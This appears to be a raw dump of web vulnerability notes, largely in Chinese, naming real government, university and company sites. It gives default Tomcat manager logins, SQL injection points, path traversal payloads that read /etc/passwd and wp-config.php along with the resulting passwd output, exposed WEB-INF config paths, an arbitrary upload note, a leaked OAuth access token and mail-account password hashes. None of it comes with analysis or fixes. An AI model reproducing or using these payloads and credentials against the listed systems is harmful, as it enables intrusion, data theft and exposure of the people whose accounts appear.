http://jggswb.sjz12333.gov.cn:7001/console/login/LoginForm.jsp url:http://118.212.189.70:80/manager/html user:admin http://221.182.229.26/jyz/#/Default.xaml http://218.59.180.6:8888/dyjyz/#/Default.xaml http://220.163.128.58:8888/ynjyz/#/Default.xaml http://wooyun.org/bugs/wooyun-2013-027067 http://everysync.lenovo.com.cn/ url:http://222.222.62.76:80/manager/html user:admin pass:123 http://222.240.131.163/ url:http://124.161.245.144:80/manager/html user:admin pass:admin https://www.qiban365.com/zuhu/getpassword/Com_getPwd2.do http://www.itscholar.com/itsviewtopic.php?f=21&t=1774 http://www.itscholar.com/itsviewforum.php?f=21 http://www.itscholar.com/itcability.php?f=26&t=497 http://www.itscholar.com/Lesson/lesson.php?f=23&t=273 http://www.itscholar.com/css/ http://www.itscholar.com/tmp/ http://www.itscholar.com/itcability.php?f=26&t=497 http://www.itscholar.com/phpmyadmin/index.php http://www.itscholar.com/test.php http://www.itscholar.com/phpbb/ http://www.itscholar.com/code.php root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh http://www.spgbjy.gov.cn/zxpt/ admin:9999**可登陆后台 http://www.yiban.cn/toschool.php http://www.yiban.cn/ajax/reg_funcs.php?action=getNewclassBySchoolid&school_id=101 http://www.csai.tsinghua.edu.cn/,网站使用的wp主题存在任意文件下载漏洞,访问http://www.csai.tsinghua.edu.cn/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php,就可以下载wp-config.php文件,内有mysql的密码,可能会被继续渗透。发现漏洞后没有深入测试。 http://211.151.12.44/ http://211.151.12.44/admin/ http://kjc.upc.edu.cn/sub/jgsz.aspx?cid=002&sid=002001 http://www.szgl.net/web_new/hyb/ly_ck.asp?id=2107参数id存在注入 http://in.sdo.com/ http://www.yichemall.com/ http://www.yichemall.com/product/getmasterbrand http://221.239.0.160/ http://www.tootoo.cn/ http://121.199.34.73:81 http://121.9.222.177:8080/ http://www.51yougo.com/MemberZone/List-Order.aspx?Code=D-20150111-00002#订单号是日期-5位数字,即第一个订单00001,00002 http://www.91taoke.com/index.php?m=Peitao&a=index&pkid=6119,该出存在sql注入,可直接sqlmap爆破 http://www.xnsl.gov.cn/ http://www.xnsl.gov.cn//c.php http://gkzp.njnu.edu.cn/ http://www.gggxw.gov.cn/show.asp?id=821 http://www.gggxw.gov.cn/eWebEditor/Admin_Login.asp http://wooyun.org/bugs/wooyun-2015-091289 http://wooyun.org/bugs/wooyun-2015-091290 http://wooyun.org/bugs/wooyun-2015-091291 http://wooyun.org/bugs/wooyun-2015-091292 http://wooyun.org/bugs/wooyun-2015-091293 http://www.asp168.com/default.php?mod=article&fid=47 http://www.tzpolice.gov.cn/getjwj.php?op=1 http://www.tzpolice.gov.cn/getjwj.php?op=1 www.yixing.gov.cn/getjwj.php?op=1&id=1 http://www.bzgt.gov.cn http://www.chongchuan.gov.cn http://www.yixing.gov.cn http://www.huishan.gov.cn http://www.ntgz.gov.cn/ http://www.anji.gov.cn http://www.shsmu.edu.cn http://www.lixin.edu.cn http://www.sdju.edu.cn http://eng.shift.edu.cn http://www.njedu.gov.cn http://www.hnsqga.gov.cn http://www.whga.cn http://www.pingpinganan.gov.cn http://www.ahga.gov.cn http://www.ntga.gov.cn http://cts.tcl.com/ http://cts.tcl.com/admin/index.html http://cts.tcl.com/admin/index.aspx http://www.bjoil.com/ http://www.bjoil.com/bjoil/portalmember/findRegisterMember.action http://www.jhpa.com.cn/ http://www.jhpa.com.cn:89/en/print.php?artid=299 http://www.strongsoft.net/ http://oa.china-sss.com/defaultroot/GovSendFileBoxAction.do?editId=2&sendFileUserId=1&action=delBatch http://222.68.17.102/index.php/creative/item http://oa.china-sss.com/defaultroot/WorkflowCommonAction.do?curActivityId=1&flag=back http://oa.china-sss.com/defaultroot/mobile/index.jsp?action=password http://oa.china-sss.com http://203.86.55.104/ http://203.86.55.104/R9iPortal/cm/cm_info_l http://61.139.105.105:8008/ http://61.139.105.105:8008/R9iPortal/cm/cm_ http://210.44.112.101 http://210.44.112.101/R9iPortal/cm/cm_info_ http://124.128.96.98:8001/ http://124.128.96.98:8001/R9iPortal/cm/cm_i http://203.86.55.104/ http://203.86.55.104/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://61.139.105.105:8008/ http://61.139.105.105:8008/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://210.44.112.101 http://210.44.112.101/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://124.128.96.98:8001/ http://124.128.96.98:8001/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://203.86.55.104/ http://203.86.55.104/R9iPortal/cm/cm_notice_content.jsp?info_id=4* http://61.139.105.105:8008/ http://61.139.105.105:8008/R9iPortal/cm/cm_notice_content.jsp?info_id=4* http://124.128.96.98:8001/ http://124.128.96.98:8001/R9iPortal/cm/cm_notice_content.jsp?info_id=4* http://123.125.106.97/test/data.php http://123.125.106.97/test/data.php?date=../../../../../../../../../../../../../../../../etc/passwd%00&type=../../../../../../../../../../../../../../../../etc/passwd%00 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sysmon:x:60422:60422::/nonexistent:/nologin sshd:x:500:500::/home/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin libin1:x:502:502::/usr/home/libin1:/bin/bash junhai:x:503:503::/usr/home/junhai:/bin/bash qingming:x:504:504::/usr/home/qingming:/bin/bash liyuan:x:505:505::/usr/home/liyuan:/bin/bash hangang:x:507:507::/usr/home/hangang:/bin/bash wangshuo:x:508:508::/usr/home/wangshuo:/bin/bash genlei:x:509:509::/usr/home/genlei:/bin/bash xiaoyue1:x:514:514::/usr/home/xiaoyue1:/bin/bash pengjie:x:520:520::/usr/home/pengjie:/bin/bash taohui:x:528:528::/usr/home/taohui:/bin/bash yuli3:x:533:533::/usr/home/yuli3:/bin/bash search:x:536:536::/usr/home/search:/sbin/nologin xueyun:x:537:537::/usr/home/xueyun:/bin/bash jianqing:x:540:540::/usr/home/jianqing:/bin/bash hongwei6:x:542:542::/usr/home/hongwei6:/bin/bash wuhua1:x:543:543::/usr/home/wuhua1:/bin/bash mysql:x:545:545::/usr/home/mysql:/sbin/nologin xiaolong:x:547:547::/usr/home/xiaolong:/bin/bash qixing:x:548:548::/usr/home/qixing:/bin/bash liuxin4:x:549:549::/usr/home/liuxin4:/bin/bash zhuhuan:x:550:550::/usr/home/zhuhuan:/bin/bash zhongqin:x:551:551::/usr/home/zhongqin:/bin/bash leilei3:x:552:552::/usr/home/leilei3:/bin/bash yajun:x:554:554::/usr/home/yajun:/bin/bash dalong1:x:556:556::/usr/home/dalong1:/bin/bash kaijun1:x:557:557::/usr/home/kaijun1:/bin/bash zhenqiang1:x:561:561::/usr/home/zhenqiang1:/bin/bash jinqiang:x:565:565::/usr/home/jinqiang:/bin/bash rdsup_api:x:567:567::/usr/home/rdsup_api:/bin/bash chenyang:x:568:568::/usr/home/chenyang:/bin/bash shukui1:x:569:569::/usr/home/shukui1:/bin/bash bangjian:x:572:572::/usr/home/bangjian:/bin/bash kaiwei3:x:574:574::/usr/home/kaiwei3:/bin/bash maqian:x:576:576::/usr/home/maqian:/bin/bash guochao3:x:578:578::/usr/home/guochao3:/bin/bash xiaofeng6:x:580:580::/usr/home/xiaofeng6:/bin/bash xiaodong2:x:581:581::/usr/home/xiaodong2:/bin/bash wb_liukai:x:582:582::/usr/home/wb_liukai:/bin/bash wb_guorui:x:583:583::/usr/home/wb_guorui:/bin/bash wb_zhuoyue:x:584:584::/usr/home/wb_zhuoyue:/bin/bash hean:x:585:585::/usr/home/hean:/bin/bash zhuxing:x:588:588::/usr/home/zhuxing:/bin/bash xingdong:x:589:589::/usr/home/xingdong:/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin hongkai1:x:590:590::/usr/home/hongkai1:/bin/bash baohua:x:591:591::/usr/home/baohua:/bin/bash tangkai:x:592:592::/usr/home/tangkai:/bin/bash http://123.125.106.97/test/data.php?date=../../../../test/data.php%00&type=1 http://218.30.108.52:8093/ http://218.30.108.52:8093/?url=http://admin.weibo.com http://315.stock.hexun.com/login.action http://315.stock.hexun.com/ http://315.stock.hexun.com http://www.dajiawan.com/admin.php?module=HuiYuan&action=genjin&uid=1 http://nextprime.drivehq.com/iframe.html https://en.wikipedia.org/ https://www.bing.com/ https://www.baidu.com/ https://onedrive.live.com/ http://jwc.cicp.edu.cn/homepage/index.do http://www.dell-solution.com/DataInfo.aspx?id=586 http://www.dell-solution.com/VideoInfo.aspx?id=512 http://www.camac.org.cn/xiehui/xiehui.php?id=41 http://jobs.china-sss.com www.shfu.edu.cn http://app.shfu.edu.cn:8080/sis/static/logon/login.jsp http://app.shfu.edu.cn:8080/sis/static/logon/guide.doc http://app.shfu.edu.cn:8080/sis/static/logon/logon.jsp.081009bak http://211.137.109.193/ jdbc:mysql://localhost:3306/ax http://oa.china-sss.com/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile http://www.syfc.com.cn/fcjxyjs/web/xyjc/view.action http://cn.club.vmall.com/uc_server/ http://888.qq.com/ios/channel/ios_order.php?uid=1 http://exp.gliet.edu.cn/xszzzx/Admin/login.aspx http://exp.gliet.edu.cn/xszzgl/login.aspx http://onlinejudge.guet.edu.cn/guetoj/ http://ktshop.tcl.com/web/tclkt/login.jsp http://www.07073.com/plus/digg_ajax4.php?type=goodpost&id=1 URL:http://zhongguowangshi.com/search.aspx?keyword=%27 inurl:http://gd.10086.cn/10086/channel/yyt/password http://gd.10086.cn/10086/channel/yyt/sz.shtml?_login_backurl=%2fcommon%2fredirect.jsp&_logonname=1392745457&_logintype=2&_password=748874&_smsrnd=&_imagecode=%E7%EB%B5%E3%BB%F7%EA%E4%E8%EB http://www.bitcar.com/ http://www.bitcar.com/admin/Manage.aspx http://dsa.bitcar.com http://dsa.bitcar.com/Login.aspx?methed=checkLogin http://dsa.bitcar.com/Login.aspx?methed=checkLogin http://dsa.bitcar.com/Page/Manage/Login.aspx http://www.bitcar.com http://log.bitauto.com/newsstat/PageAreaStatistics/config.ashx?ids=10%29and/**/1=1--&callback=PageAreaStatistics.bind&seed=0.8790570520236984 http://202.120.40.2:81/professor.action?request_locale=zh_CN http://admin.21cn.com/WEB-INF/web.xml http://admin.21cn.com//WEB-INF/applicationContext-redis.xml http://admin.21cn.com//WEB-INF/applicationContext-mailsender.xml http://admin.21cn.com/WEB-INF/classes/mailsender.properties http://59.151.119.244/ http://59.151.119.244/ http://dgtx.com.cn/ http://oldweb.lib.sjtu.edu.cn/sjtu.tar.gz http://59.36.102.26/login/login.html http://59.36.102.26/login/login.php http://59.36.102.26/test.php inurl:cunnewslist.aspx?deptid= http://222.135.109.70:8100/cunnewslist.aspx?deptid=1566&id=277 http://222.135.76.147:8100/cunnewslist.aspx?deptid=588&id=277 http://218.56.40.229:8060/cunnewslist.aspx?deptid=4425&id=276 http://111.17.169.213:800/cunnewslist.aspx?deptid=4397&id=276 http://60.217.72.17:8000/cunnewslist.aspx?deptid=1455&id=277 http://123.134.189.60:8021/cunnewslist.aspx?deptid=5005&id=279 http://61.133.119.187:8089/cunnewslist.aspx?deptid=1273&id=277 http://www.ysland.gov.cn/xinfang/visitshow.asp?id=25 http://www.ysland.gov.cn/xinfang/rulelist.asp?cid=1 http://www.ysland.gov.cn/xinfang/ruleshow.asp?id=13 http://www.ysland.gov.cn/vote.asp http://www.ysland.gov.cn/xinfang/getpass.asp http://www.jnjgsw.cn/FindNews.aspx?newstitle=1 https://open.weibo.cn/oauth2/authorize?client_id=741740764&redirect_uri=http%3A%2F%2Faccount.xiaomi.com%2Fpass%2Fsns%2Flogin%2Fload&scope=all&response_type=code&display=mobile&packagename=com.xiaomi.channel&key_hash=d52e033c39b6f47a0248b2505a2d6a91 https://open.weibo.cn/oauth2/authorize http://account.xiaomi.com/pass/sns/login/load?access_token=2.00ByhXsF0ieQMoa397a2459f8ETrVD&remind_in=7799376&expires_in=7799376&uid=5386620141 http://account.xiaomi.com/pass/sns/login/load,所以会导致Access https://account.xiaomi.com/pass/sns/login/load?access_token=2.00ByhXsF0ieQMoa397a2459f8ETrVD&remind_in=7818085&expires_in=7818085&uid=5386620141 http://account.xiaomi.com/pass/sns/login/load作为重定向URL,造成了Access http://www.ccbd.cn/ http://www.ccbd.cn/test.php http://www.slfc.net.cn/list.php?&cid=224 http://xq.ibaihe.com/baihe/login http://wap.sogou.com/ http://www.cmccb.org.cn/cmccbnew/SiteInfo/SiteInfo_selinfo.php?ID=238 http://www.cmccb.org.cn/cmccbnew/Pyj/Pyj_selinfo.php?Pyj_Code=51 http://www.cmccb.org.cn/cmccbnew/SiteInfo/SiteInfo_Onesel.php?Bar_ID=26 http://www.cmccb.org.cn/cmccbnew/Germ/Germ_sel.php http://www.cmccb.org.cn http://www.cmccb.org.cn/cmccbnew/Germ/Germ_sel.php www.cmccb.org.cn http://oa.china-sss.com/defaultroot/govezoffice/gov_documentmanager/govdocumentmanager_judge.jsp?numId=1 http://oa.china-sss.com/defaultroot/govezoffice/gov_documentmanager/govdocumentmanager_judge_seq.jsp?seqId=1&seqfig=1&recordId=1 http://211.149.204.144:8080/ http://114.251.15.2/gams/login.php http://jiangjia.bitauto.com/zixun.ashx?action=zixun&p=50005350_112621&_=1421048786873 http://www.8684.cn/ http://passport.8684.com url:http://119.145.57.20:85/manager/html user:tomcat pass:tomcat http://m.yaofang.cn http://m.yaofang.cn//cart/disList www.wooyun.org/bugs/wooyun-2010-086923 http://www.zbcdc.com/info_Print.asp?ArticleID=1296 http://www.zbcdc.com/article_js.asp?ClassID=1&IncludeChild=true&SpecialID=1&ArticleNum=6&ShowType=1&ShowCols=1&ShowProperty=true&ShowClassName=false&ShowIncludePic=false&ShowTitle=true&ShowUpdateTime=false&ShowHits=false&ShowAuthor=false&ShowHot=true&ShowMore=false&TitleMaxLen=30&ContentMaxLen=200&Hot=false&Elite=false&DateNum=&OrderField=ArticleID&OrderType=desc http://www.zbcdc.com/yufangyixue/info_Print.asp?ArticleID=1168 http://www.zbcdc.com/yufangyixue/news_Class.asp?ClassID=1&SpecialID=0&page=1 http://www.zbcdc.com/yufangyixue/info_Class.asp?ClassID=1&SpecialID=0&page=1 http://www.zbcdc.com/info_Class.asp?ClassID=28&SpecialID=0&page=1 http://m.yaofang.cn/cart/cityList post:province_id= url:http://m.yaofang.cn//cart/delGoods post:goods_id=&r=0.6412887854967266 get:http://m.yaofang.cn/cart/disList url:http://m.yaofang.cn//cart/updateCartGoodsNumber url:http://aiesecsysu.org/admin/login/auth http://ims.zj31.net/pm/sys/Login_dologin.action http://is.gd/wnezNK http://59.151.102.92/,这个ip段应该是易车。。。的吧。 http://oa.yto56.com.cn//C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmail&UserName= inurl:townnewslist.aspx?deptid= http://222.135.127.190:7000/townnewslist.aspx?deptid=190&id=220 http://221.2.171.59:8000/townnewslist.aspx?deptid=156&id=246 http://61.133.119.187:8089/townnewslist.aspx?deptid=153&id=257 http://218.56.40.229:8032/townnewslist.aspx?deptid=3952&id=220 http://222.135.109.70:8100/townnewslist.aspx?deptid=172&id=246 http://218.58.124.131:8002/townnewslist.aspx?deptid=4537&id=224 http://222.135.127.190:7000/townnews.aspx?deptid=180&id=265&at=1 http://222.135.76.147:8100/townnews.aspx?deptid=205&id=265&at=1 http://222.135.109.70:8100/townnews.aspx?deptid=765&id=265&at=1 http://221.2.171.59:8000/townnews.aspx?deptid=1376&id=265&at=1 http://221.2.149.47:8100/townnews.aspx?deptid=196&id=265&at=1 http://www.scww.org.cn/index.php/News/contentpage?aid=643 http://ehr.tcl.com/Audit/login.aspx http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelAuthentication/myApply/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/?menuId=0000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/modify_company/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/certmanager/mycerts/?menuId=2000001 http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/MyRegistrationApplies/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/pending/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/ChannelRegistration/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/channel_partner/patnersQuery/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003 http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003 http://lab.sdut.edu.cn/jsjrjsys/shownews.asp?newsid=103%27 http://home.focus.cn/group/endresult.php?v_poll_id=5036&group_id=1728&m=0 http://**.**.**/xgrptwo/index.jsp command:emailAccount=chenjf32@1269,udId=46,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.84&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&AUTO_REPLY_MSG=&SIGNATURE=&SECRET_ANSWER=&COLOR_ID=&WARNING_QUOTA=&SEND_MAIL_NAME=&PASSWORD=&SECRET_QUESTION=,managerAccount=null,ret=AUTO_FORWARD=&SEND_MAIL_NAME=&CONTACT=&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=8&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7D607d3b7eb6f521f22c7856df720a8462&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0 command:emailAccount=frank.han@15164,udId=38,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.88&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&A&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=216&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7Dfa1105eab2c3cfefc46f478d083070b7&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0 http://exam.chanjet.com/exam/portal/index.jsp http://exam.chanjet.com/exam/userphoto/a/8/1/4/7/ff8080814ab5661b014ade066e4d0822.jsp http://ts.21cn.com/tousu/cat/id/index.php?m=Home&a=topreply&id=13818%23 http://zhaopin.nau.edu.cn/contoller.do?operation=readInfo&queryId=289 http://sm4.iphy.ac.cn/n_list.php?fid=5 http://aliyun.com http://www.net.cn http://aliyun.com https://github.com/xiaodingbian/fengchu/blob/3618c8a1d18084d7fbb3f3c236ba3491bd7615ec/common/src/test/resources/wolong.properties http://smsgate.ucweb.com:8090/send http://vip.189.cn/web/front/downloadFile?name=/../../../../../../../..//../../etc/passwd%00.docx http://114.80.121.164/a http://219.148.21.226 http://admin.china-eroom.com:8080/login_toLogin.action http://60.216.47.168:XXXX/defaultroot/login.jsp url:http://211.103.171.50:8180/manager/html http://211.103.171.50/ http://www.credithe.com/ http://www.hexincaifu.com/ http://211.103.171.50:8085/ http://202.120.188.139/Citrix/XenApp/auth/login.aspx http://cmp.surfing3c.com:9500/platform/framework/global/login.jsp http://cmp.surfing3c.com:9500/ http://cmp.surfing3c.com:9500/web-console/ http://218.241.153.225:6100/superadmin/adminLogin.action http://port.joycloud.mobi:81/WebServices/SMS/send_smsserver.ashx http://port.joycloud.mobi:81/WebServices/SMS/send_smsserver.ashx?username=XXXX&pwd=XXXX&phone_number=13911403029&neirong=您的验证码是123456 app.hexindai.com/nicai http://app.hexindai.com/nicai http://www.noahwm.com/skin/myfof/mb/m.aspx?id=59 http://www.noahwm.com/skin/myfof/mb/m.aspx?id=59 inurl:xmlpzs/prewebissue.asp inurl:xmlpzs/nowwebissue.asp www.tazzfdc.com/bit-xxzs_new/xmlpzs/prewebissue.asp www.bjsfdc.com.cn/bit-xxzs/xmlpzs/prewebissue.asp www.xnfcxx.com/bit-xxzs/xmlpzs/prewebissue.asp www.xyfg.gov.cn/bit-xxzs/xmlpzs/prewebissue.asp cn:5661/bit-xxzs/xmlpzs/prewebissue.asp www.lzfg.com.cn/bit-xxzs/xmlpzs/prewebissue.asp sys.syfdc.gov.cn/tt/bit-xxzs/gs/xmlpzs/prewebissue.asp www.whxfdc.com/bit-xxzs/xmlpzs/prewebissue.asp www.scybfdc.com/ybxxzs/xmlpzs/prewebissue.asp www.xjfyfc.com/bit-xxzs/xmlpzs/prewebissue.asp www.xjksfcw.com/bit-xxzs/xmlpzs/prewebissue.asp www.bjsfdc.com.cn/bit-xxzs/xmlpzs/nowwebissue.asp www.hzfjw.com:8081/bit-xxzs/xmlpzs/nowwebissue.asp www.lzfg.com.cn/bit-xxzs/xmlpzs/nowwebissue.asp huangshanhouse.gov.cn/xmlpzs/nowwebissue.asp www.xyfg.gov.cn/bit-xxzs/xmlpzs/nowwebissue.asp www.tazzfdc.gov.cn/bit-xxzs/xmlpzs/nowwebissue.asp sys.syfdc.gov.cn/tt/bit-xxzs/gs/xmlpzs/nowwebissue.asp www.lwfccs.com/bit-xxzs/xmlpzs/nowwebissue.asp www.wnfdc.com/bit-xxzs/xmlpzs/nowwebissue.asp site:21tb.com bjd.tcl.com/faqs.aspx?faqskeyword=tcl http://baodian.women.sohu.com/Report/ajax_getReport http://www.wxcitycq.com http://218.206.27.200:8080/cqCityFM/ygjw/vcode!veriImg.action?id=9c3583ebe8e442f2ac99cb4072221d45 https://github.com/cnzhangzhen/IWOM/blob/b9fa38f2c0ea207f9c673fa0be8e284c90abb6f8/config/environment.rb http://116.228.188.147:8484/gcportal/login.jsp http://116.228.188.147:8484/setup/ http://www.cartel.tcl.com/ http://www.dantu.gov.cn/allStation/dantu/www_dantu_gov_cn/advicesubjectqzzc.jsp?saasAppId=1044b6f7-8a6a-4f9b-9d88-74c59c9c691f&webStationId=www_dantu_gov_cn&webSubjectId=www_dantu_gov_cn_82&id=2d7f6b01-6d80-484d-8219-cba1735bfdac http://gdjct.gmcc.net:8080/content/add.jspx?cid=111上传附件的位置存在任意文件上传,方法太简单,就不讲了 http://202.192.128.60/jyzc/baoxiu/admin/ http://202.192.128.60/jyzc/baoxiu/admin/admin_user_edit.asp?user_id=1页面修改管理员密码时,发现原密码经过md5加密后泄漏在源代码中。于是F12果断拿下md5破解之。如图 http://read.html5.qq.com/image?imageUrl=http://10.156.52.13/favicon.ico http://www.xzwsxx.org/sys_jmda/Admin/framework.aspx http://www.zzrc.cn/index/forgetpassw.do http://www.zzrc.cn/index/nextforgetpassw.do http://www.zzrc.cn/index/findpassthreestep.do http://www.zzrc.cn/index/updateperInfo.do http://wooyun.org/bugs/wooyun-2010-089495 http://ufbg-ss02.yonyou.com/Login/login.aspx?ReturnUrl=%2flogin.aspx http://desktop.yonyou.com/Login/login.aspx?ReturnUrl=%2flogin.aspx https://jumppageitg.houston.hp.com/personalcloud/home.action http://www.taishan.gd.cn/user/userreg.asp www.taishan.gd.cn http://www.taishan.gd.cn http://www.taishan.gd.cn/user/userreg.asp http://114.80.121.164/ http://www.dyrc114.com/news/list.asp?boardid=15 http://www.dyrc114.com/news/list.asp?boardid=15 http://drops.wooyun.org/tools/3186 http://uxss.sinaapp.com/index.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin webuser:x:500:100::/home/webuser:/bin/bash yangfentao:x:501:501::/home/yangfentao:/bin/bash http://patent.tcl.com/console/ facetime:test@wooyun.org http://www.greefinance.com/,站点,打开珠海格力集团财务有限公司,发现了多处注入点。1.http://www.greefinance.com/showcontext.asp?showid=108,如图所示: http://www.greefinance.com/ywjs.asp?ywjsid=1,如图所示: http://www.greefinance.com/gsjj.asp?gsjjid=1,如图所示: www.sxyrcb.com/admin/admin_admin.asp http://drops.wooyun.org/tools/3186 http://uxss.sinaapp.com/index.php https://121.14.133.156/ http://rb.dantu.gov.cn/allStation/rb/rb_dantu_gov_cn/subject.jsp?webSubjectId=rb_dantu_gov_cn_1¤tPage=1 http://kk.landray.com.cn:8081/head/head.php?username=yangjw http://www.ihaier.com/ http://www.ihaier.com/Project/detail/id/2186 http://ocean.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=510301-10146 http://159.226.22.201:9010/Portal/metadata/downloadMetadataXML.jsp?id=100106-10041 http://lake.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=210008-10099 http://tibet.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=100111-10000 http://henu.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=475000-4 http://member.yuxindata.com http://member.yuxindata.com http://mail.zaojiao.com.cn/phpmyadmin http://tuan.bitauto.com/activity/BM-188/20005/2032* http://www.kkdao.com/ https://agent.hexindai.com/guarantee/login.html https://agent.hexindai.com/recommend/login.html http://www.datacarrier.cn/ http://scm.wyn88.com/sas/supplierIndex/supplierIndexAction!getDatasByType.action http://61.175.99.147/admin/ http://xinyi.creditease.cn/ajax.do?action=download&file=../../../../../../../../../../{{}} 